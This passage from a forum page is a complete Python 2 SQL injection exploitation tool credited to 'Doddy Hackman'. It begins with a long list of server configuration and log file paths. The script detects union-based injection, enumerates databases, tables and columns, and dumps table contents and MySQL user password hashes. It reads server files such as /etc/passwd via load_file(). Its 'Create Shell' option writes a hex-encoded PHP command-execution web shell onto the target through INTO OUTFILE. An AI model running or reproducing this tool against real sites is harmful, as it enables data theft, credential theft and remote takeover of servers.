pt/httpd/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf","/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf","/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php","/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php","/usr/local/etc/apache/vhosts.conf","/etc/php.ini","/bin/php.ini","/etc/httpd/php.ini","/usr/lib/php.ini","/usr/lib/php/php.ini","/usr/local/etc/php.ini","/usr/local/lib/php.ini","/usr/local/php/lib/php.ini","/usr/local/php4/lib/php.ini","/usr/local/php5/lib/php.ini","/usr/local/apache/conf/php.ini","/etc/php4.4/fcgi/php.ini","/etc/php4/apache/php.ini","/etc/php4/apache2/php.ini","/etc/php5/apache/php.ini","/etc/php5/apache2/php.ini","/etc/php/php.ini","/etc/php/php4/php.ini","/etc/php/apache/php.ini","/etc/php/apache2/php.ini","/web/conf/php.ini","/usr/local/Zend/etc/php.ini","/opt/xampp/etc/php.ini","/var/local/www/conf/php.ini","/etc/php/cgi/php.ini","/etc/php4/cgi/php.ini","/etc/php5/cgi/php.ini","c:\\php5\\php.ini","c:\\php4\\php.ini","c:\\php\\php.ini","c:\\PHP\\php.ini","c:\\WINDOWS\\php.ini","c:\\WINNT\\php.ini","c:\\apache\\php\\php.ini","c:\\xampp\\apache\\bin\\php.ini","c:\\NetServer\\bin\\stable\\apache\\php.ini","c:\\home2\\bin\\stable\\apache\\php.ini","c:\\home\\bin\\stable\\apache\\php.ini","/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini","/usr/local/cpanel/logs","/usr/local/cpanel/logs/stats_log","/usr/local/cpanel/logs/access_log","/usr/local/cpanel/logs/error_log","/usr/local/cpanel/logs/license_log","/usr/local/cpanel/logs/login_log","/var/cpanel/cpanel.config","/var/log/mysql/mysql-bin.log","/var/log/mysql.log","/var/log/mysqlderror.log","/var/log/mysql/mysql.log","/var/log/mysql/mysql-slow.log","/var/mysql.log","/var/lib/mysql/my.cnf","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\data\\hostname.err","C:\\ProgramFiles\\MySQL\\data\\mysql.log","C:\\ProgramFiles\\MySQL\\data\\mysql.err","C:\\ProgramFiles\\MySQL\\data\\mysql-bin.log","C:\\MySQL\\data\\hostname.err","C:\\MySQL\\data\\mysql.log","C:\\MySQL\\data\\mysql.err","C:\\MySQL\\data\\mysql-bin.log","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.ini","C:\\ProgramFiles\\MySQL\\MySQLServer5.0\\my.cnf","C:\\ProgramFiles\\MySQL\\my.ini","C:\\ProgramFiles\\MySQL\\my.cnf","C:\\MySQL\\my.ini","C:\\MySQL\\my.cnf","/etc/logrotate.d/proftpd","/www/logs/proftpd.system.log","/var/log/proftpd","/etc/proftp.conf","/etc/protpd/proftpd.conf","/etc/vhcs2/proftpd/proftpd.conf","/etc/proftpd/modules.conf","/var/log/vsftpd.log","/etc/vsftpd.chroot_list","/etc/logrotate.d/vsftpd.log","/etc/vsftpd/vsftpd.conf","/etc/vsftpd.conf","/etc/chrootUsers","/var/log/xferlog","/var/adm/log/xferlog","/etc/wu-ftpd/ftpaccess","/etc/wu-ftpd/ftphosts","/etc/wu-ftpd/ftpusers","/usr/sbin/pure-config.pl","/usr/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.conf","/usr/local/etc/pure-ftpd.conf","/usr/local/etc/pureftpd.pdb","/usr/local/pureftpd/etc/pureftpd.pdb","/usr/local/pureftpd/sbin/pure-config.pl","/usr/local/pureftpd/etc/pure-ftpd.conf","/etc/pure-ftpd/pure-ftpd.pdb","/etc/pureftpd.pdb","/etc/pureftpd.passwd","/etc/pure-ftpd/pureftpd.pdb","/var/log/pure-ftpd/pure-ftpd.log","/logs/pure-ftpd.log","/var/log/pureftpd.log","/var/log/ftp-proxy/ftp-proxy.log","/var/log/ftp-proxy","/var/log/ftplog","/etc/logrotate.d/ftp","/etc/ftpchroot","/etc/ftphosts","/var/log/exim_mainlog","/var/log/exim/mainlog","/var/log/maillog","/var/log/exim_paniclog","/var/log/exim/paniclog","/var/log/exim/rejectlog","/var/log/exim_rejectlog"]
  8.  
  9. def installer():
  10. try:
  11.  os.mkdir("logs",0777)
  12. except:
  13.  pass
  14.  
  15. def clean():
  16. if sys.platform=="win32":
  17.  os.system("cls")
  18. else:
  19.  os.system("clear")
  20.  
  21. def savefile(name,text):
  22. file = open(name,"a")
  23. file.write("\n"+text)
  24. file.close()
  25.  
  26. def gethost(test):
  27. return urlparse(test).netloc
  28.  
  29. def header() :
  30. print ""
  31. print ""
  32. print " @      @@   @   "          
  33. print "@@     @  @ @@      "      
  34. print " @ @@  @  @  @ @   @ @ @@@ "
  35. print " @ @   @  @  @@ @ @@@ @  @ "
  36. print " @@    @  @  @  @  @   @@@ "
  37. print " @ @   @  @  @  @  @  @  @ "
  38. print "@@@ @   @@   @@@  @@@ @@@@@"
  39. print ""
  40. print ""
  41.  
  42. def copyright() :
  43. print "\n\n(C) Doddy Hackman 2010\n"
  44.  
  45. def show() :
  46. print "\n[*] Sintax : ",sys.argv[0]," <web>\n"
  47.  
  48. def toma(web) :
  49. nave = urllib2.Request(web)
  50. nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
  51. op = urllib2.build_opener()
  52. return op.open(nave).read()
  53.  
  54. def bypass(bypass):
  55. if bypass == "--":
  56.  return("+","--")
  57. elif bypass == "/*":
  58.  return("/**/","/**/")
  59. else:
  60.  return("+","--")
  61.  
  62. def reiniciar():
  63. copyright()
  64. raw_input()
  65. sta()
  66.  
  67. def dumper(web,passx,table,col1,col2):
  68.  
  69. pass1,pass2 = bypass(passx)
  70. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  71. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
  72. code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  73. print "\n\n[+] Searching values\n\n"
  74. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  75.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  76.  numbers = numbers[0]
  77.  savefile("logs/"+gethost(web)+".txt","")
  78.  savefile("logs/"+gethost(web)+".txt","[+] Values Found in table "+table+" : "+numbers+"\n")
  79.  print "[+] Values Found : ",numbers,"\n"
  80.  for counter in range(0,int(numbers)):
  81.   code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  82.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  83.    c1 = re.findall("K0BRA(.*?)K0BRA",code2)
  84.    c1 = c1[0]
  85.    c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
  86.    c2 = c2[0]
  87.    print "["+col1+"] : "+c1
  88.    print "["+col2+"] : "+c2+"\n"
  89.    savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
  90.    savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
  91. else:
  92.  print "[-] Not Found\n"
  93.  
  94. def mysqluser(web,passx):
  95. pass1,pass2 = bypass(passx)
  96. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  97. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
  98. code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  99. print "\n\n[+] Searching mysql.user\n\n"
  100. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  101.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  102.  numbers = numbers[0]
  103.  print "[+] mysql.user : ON"
  104.  savefile("logs/"+gethost(web)+".txt","")
  105.  savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
  106.  savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
  107.  print "[+] Users Found : ",numbers,"\n"
  108.  for counter in range(0,int(numbers)):
  109.   code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  110.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  111.    host = re.findall("K0BRA(.*?)K0BRA",code2)
  112.    host = host[0]
  113.    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
  114.    user = user[0]
  115.    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
  116.    passw = passw[0]
  117.    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
  118.    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
  119.    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
  120.    print "[Host] : "+host
  121.    print "[User] : "+user
  122.    print "[Pass] : "+passw+"\n"    
  123. else:
  124.  print "[-] Not Found\n"
  125.  
  126.  
  127. def showcolumnsdb(web,db,table,passx):
  128. db2 = db
  129. table2 = table
  130. db = "0x"+str(binascii.hexlify(db))
  131. table = "0x"+str(binascii.hexlify(table))
  132. pass1,pass2 = bypass(passx)
  133. savefile("logs/"+gethost(web)+".txt","")
  134. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  135. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  136. code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
  137. print "\n\n[+] Searching columns in DB\n\n"
  138. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  139.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  140.  numbers = numbers[0]
  141.  print "[+] information_schema : ON"
  142.  print "[+] Columns Found : ",numbers,"\n"
  143.  for counter in range(0,int(numbers)):
  144.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  145.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  146.    column = re.findall("K0BRA(.*?)K0BRA",code2)
  147.    column = column[0]
  148.    savefile("logs/"+gethost(web)+".txt","[Column Found in table "+table2+" in DB "+table2+"] : "+column)
  149.    print "[Column Found] : "+column
  150. else:
  151.  print "[-] Not Found\n"
  152.  
  153.  
  154. def showtablesdb(web,db,passx):
  155. db2 = db
  156. db = "0x"+str(binascii.hexlify(db))
  157. pass1,pass2 = bypass(passx)
  158. savefile("logs/"+gethost(web)+".txt","")
  159. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  160. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  161. code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
  162. print "\n\n[+] Searching tables in DB\n\n"
  163. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  164.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  165.  numbers = numbers[0]
  166.  print "[+] information_schema : ON"
  167.  print "[+] Tables Found : ",numbers,"\n"
  168.  for counter in range(0,int(numbers)):
  169.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  170.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  171.    table = re.findall("K0BRA(.*?)K0BRA",code2)
  172.    table = table[0]
  173.    print "[Table Found] : "+table
  174.    savefile("logs/"+gethost(web)+".txt","[Table Found in DB "+db2+"] : "+table)
  175. else:
  176.  print "[-] Not Found\n"
  177.  
  178. def showtables(web,passx):
  179. pass1,pass2 = bypass(passx)
  180. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
  181. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
  182. code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  183. print "\n\n[+] Searching tables\n\n"
  184. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  185.  savefile("logs/"+gethost(web)+".txt","")
  186.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  187.  numbers = numbers[0]
  188.  print "[+] information_schema : ON"
  189.  print "[+] Tables Found : ",numbers,"\n"
  190.  for counter in range(17,int(numbers)):
  191.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  192.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  193.    table = re.findall("K0BRA(.*?)K0BRA",code2)
  194.    table = table[0]
  195.    print "[Table Found] : "+table
  196.    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
  197. else:
  198.  print "[-] Not Found\n"
  199.  
  200. def showcolumns(tabla,web,passx):
  201. pass1,pass2 = bypass(passx)
  202. tabla2 = tabla
  203. tabla = "0x"+str(binascii.hexlify(tabla))
  204. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
  205. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
  206. code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
  207. print "\n\n[+] Searching columns\n\n"
  208. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  209.  savefile("logs/"+gethost(web)+".txt","")
  210.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  211.  numbers = numbers[0]
  212.  print "[+] information_schema : ON"
  213.  print "[+] Columns Found : ",numbers,"\n"
  214.  for counter in range(0,int(numbers)):
  215.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  216.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  217.    column = re.findall("K0BRA(.*?)K0BRA",code2)
  218.    column = column[0]
  219.    print "[Column Found in table "+tabla2+"] : "+column
  220.    savefile("logs/"+gethost(web)+".txt","[Column Found in table "+tabla2+"] : "+column)
  221. else:
  222.  print "[-] Not Found\n"
  223.  
  224.  
  225. def showdbs(web,passx):
  226. pass1,pass2 = bypass(passx)
  227. web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
  228. web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
  229. code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  230. print "\n\n[+] Searching DBS\n\n"
  231. if (re.findall("K0BRA(.*?)K0BRA",code1)):
  232.  savefile("logs/"+gethost(web)+".txt","")
  233.  numbers = re.findall("K0BRA(.*?)K0BRA",code1)
  234.  numbers = numbers[0]
  235.  print "[+] information_schema : ON"
  236.  print "[+] DBS Found : ",numbers,"\n"
  237.  for counter in range(0,int(numbers)):
  238.   code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
  239.   if (re.findall("K0BRA(.*?)K0BRA",code2)):
  240.    db = re.findall("K0BRA(.*?)K0BRA",code2)
  241.    db = db[0]
  242.    print "[DB Found] : "+db
  243.    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
  244. else:
  245.  print "[-] Not Found\n"
  246.  
  247. def men():
  248. print "\n[+] Press any key to continue\n"
  249. raw_input()    
  250. menu(page,bypass)
  251.  
  252. def fuzz(web,bypassx):
  253. print "\n[+] Fuzzing files with load_file()\n"
  254. pass1,pass2 = bypass(bypassx)
  255. for archivos in files:
  256.  nombre = archivos
  257.  file = "0x"+str(binascii.hexlify(archivos))
  258.  web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)
  259.  
  260.  code = toma(web1)
  261.  
  262.  if (re.findall("k0bra(.*?)k0bra",code,re.S)):
  263.   algo = re.findall("k0bra(.*?)k0bra",code,re.S)
  264.   print "\n[File Found] : ",nombre
  265.   print "\n[Source Start]\n"
  266.   print algo[0]
  267.   print "\n[Source End]"
  268.   savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
  269.   savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
  270.   savefile("logs/"+gethost(web)+".txt",algo[0])
  271.   savefile("logs/"+gethost(web)+".txt","\n[Source End]")
  272. print "\n[+] Finished\n"
  273.  
  274. def fuzzfile(web,bypassx):
  275. pass1,pass2 = bypass(bypassx)
  276. archivos = raw_input("\n[File To load] : ")
  277. nombre = archivos
  278. file = "0x"+str(binascii.hexlify(archivos))
  279. web1 = re.sub("hackman","unhex(hex(concat(char(107,48,98,114,97),load_file("+file+"),char(107,48,98,114,97))))",web)
  280.  
  281. code = toma(web1)
  282.  
  283. if (re.findall("k0bra(.*?)k0bra",code,re.S)):
  284.  algo = re.findall("k0bra(.*?)k0bra",code,re.S)
  285.  print "\n\n[File Found] : ",nombre
  286.  print "\n[Source Start]\n"
  287.  print algo[0]
  288.  print "\n[Source End]"
  289.  savefile("logs/"+gethost(web)+".txt","\n[File Found] : "+nombre)
  290.  savefile("logs/"+gethost(web)+".txt","\n[Source Start]\n")
  291.  savefile("logs/"+gethost(web)+".txt",algo[0])
  292.  savefile("logs/"+gethost(web)+".txt","\n[Source End]")
  293. else:
  294.  print "\n\n[-] Error"
  295.  
  296. def into(web,passx):
  297. pass1,pass2 = bypass(passx)
  298. dira = raw_input("\n\n[Full Source Discloure] : ")
  299. diro = raw_input("\n[Directory to test] : ")
  300.  
  301. linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  302. lugar = dira+"/cmd.php"
  303. lugardos = diro+"/cmd.php"
  304. webtest = "http://"+gethost(web)+lugardos
  305. web1 = re.sub("hackman",linea,web)
  306. formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  307. toma(formandoweb)
  308. code = toma(webtest)
  309. if (re.findall("Mini Shell By Doddy",code)):
  310.  print "\n\n[shell up] : "+webtest
  311.  savefile("logs/"+gethost(web)+".txt","\n[shell up] : "+webtest)
  312. else:
  313.  print "\n\n[-] Error"
  314.  
  315.  
  316. def menu(page,bypass):
  317. clean()
  318. header()
  319. print "\n[+] Target : ",page,"\n"
  320. print "\n[information_schema]\n"
  321. print "1 - Show tables"
  322. print "2 - Show columns of the a table"
  323. print "3 - Show databases"
  324. print "4 - Show tables from the a DB"
  325. print "5 - Show columns from the a table of the DB"
  326. print "\n[mysql.user]\n"
  327. print "6 - Show users"
  328. print "\n[Others]\n"
  329. print "7 - Show details"
  330. print "8 - Dump data"
  331. print "9 - Fuzz Files with load_file"
  332. print "10 - Load files with load_file"
  333. print "11 - Create Shell"
  334. print "12 - Show log"
  335. print "13 - Change target"
  336. print "14 - Exit\n\n"
  337.  
  338.  
  339. try:
  340.  
  341.  op = input("[Option] : ")
  342.  
  343.  if op == 1:
  344.   showtables(page,bypass)
  345.   men()
  346.  elif op == 2:
  347.   table = raw_input("\n\n[Table] : ")
  348.   showcolumns(table,page,bypass)
  349.   men()
  350.  elif op == 3:
  351.   showdbs(page,bypass)
  352.   men()
  353.  elif op == 4:
  354.   db = raw_input("\n\n[DB] : ")
  355.   showtablesdb(page,db,bypass)
  356.   men()
  357.  elif op == 5:
  358.   db = raw_input("\n\n[DB] : ")
  359.   table = raw_input("\n\n[Table] : ")
  360.   showcolumnsdb(page,db,table,bypass)
  361.   men()
  362.  elif op == 6:
  363.   mysqluser(page,bypass)
  364.   men()
  365.  elif op == 7:
  366.   more(page,bypass)
  367.   men()
  368.  elif op == 8:
  369.  
  370.   table = raw_input("\n\n[Table] : ")
  371.   col1 = raw_input("\n\n[Column 1] : ")
  372.   col2 = raw_input("\n\n[Column 2] : ")
  373.   dumper(page,bypass,table,col1,col2)
  374.   men()
  375.  
  376.  elif op == 9:
  377.   fuzz(page,bypass)
  378.   men()
  379.  elif op == 10:
  380.   fuzzfile(page,bypass)
  381.   men()
  382.  elif op == 11:
  383.   into(page,bypass)
  384.   men()
  385.  elif op == 12:
  386.   os.system("start logs/"+gethost(page)+".txt")
  387.   menu(page,bypass)
  388.  elif op == 13:
  389.   sta()
  390.  elif op == 14:
  391.   sys.exit(1)  
  392.  else:
  393.   menu(page,bypass)
  394. except:
  395.  menu(page,bypass)
  396.  
  397. def more(web,passx):
  398. pass1,pass2 = bypass(passx)
  399. otraweb = web
  400. print "\n[+] Searching more data\n"
  401. hextest = "0x2f6574632f706173737764"
  402. web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
  403. web2 = re.sub("hackman","unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))",otraweb)
  404. code0 = toma(web1+pass2)
  405. if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
  406.  datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
  407.  datar = re.split("K0BRA",datax[0])
  408.  savefile("logs/"+gethost(web)+".txt","")
  409.  print "[+] Username :",datar[1]
  410.  print "[+] Database :",datar[2]
  411.  print "[+] Version :",datar[3],"\n"
  412.  savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
  413.  savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
  414.  savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
  415. code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  416. if (re.findall("K0BRA",code1)):
  417.   print "[+] mysql.user : on"
  418.   savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
  419. code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  420. if (re.findall("K0BRA",code2)):
  421.   print "[+] information_schema.tables : on"
  422.   savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")
  423. codetres = toma(web2)
  424. if (re.findall("ERTOR854",codetres)):
  425.  print "[+] load_file() : on"
  426.  savefile("logs/"+gethost(web)+".txt","[+] load_file() : on")
  427.  
  428. def findlength(web,passx):
  429. pass1,pass2 = bypass(passx)
  430. print "\n[+] Finding columns length"
  431. number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
  432. for te in range(2,30):
  433.  number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
  434.  code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+number+pass2)
  435.  if (re.findall("K0BRA(.*?)K0BRA",code)):
  436.   numbers = re.findall("K0BRA(.*?)K0BRA",code)
  437.   print "[+] Column length :",te
  438.   print "[+] Numbers",numbers,"print data"
  439.   sql = ""
  440.   tex = te + 1
  441.   for sqlix in range(2,tex):
  442.    sql = str(sql)+","+str(sqlix)
  443.    sqli  = str(1)+sql
  444.   sqla = re.sub(numbers[0],"hackman",sqli)
  445.   savefile("logs/"+gethost(web)+".txt","\n[Target] : "+web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla+"\n")
  446.   menu(web+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
  447. print "[-] Length dont found\n"
  448. reiniciar()
  449.  
  450. def scan(web,passx):
  451. pass1,pass2 = bypass(passx)
  452. print "\n\n[+] Testing vulnerability"
  453. code = toma(web+"1"+pass1+"and"+pass1+"1=0"+pass2)
  454. codedos = toma(web+"1"+pass1+"and"+pass1+"1=1"+pass2)
  455.  
  456. if not code==codedos:
  457.  print "[+] SQLI Detected"
  458.  findlength(web,passx)
  459. else:
  460.  print "[-] Not Vulnerable"
  461.  op = raw_input("\n[+] Scan anyway y/n : ")
  462.  if op == "y":
  463.   findlength(web,passx)
  464.  elif op == "n":
  465.   reiniciar()
  466.  else:
  467.   reiniciar()
  468.  
  469. def sta():
  470.  
  471. clean()
  472. header()
  473.  
  474. web = raw_input("\n\n[Page] : ")
  475. bypasx = raw_input("\n\n[Bypass] : ")
  476. if (re.findall("hackman",web,re.I)):
  477.  menu(web,bypasx)
  478. else:
  479.  try:
  480.   scan(web,bypasx)
  481.  except:
  482.   print "\n[-] Web offline"
  483.   reiniciar()
  484.  
  485. installer()
  486. sta()
  487.  
  488. #The End
  489.  
Páginas: 1 ... 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 [43] 44 45 46 47 48 49 50 51 52 53 54 55
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines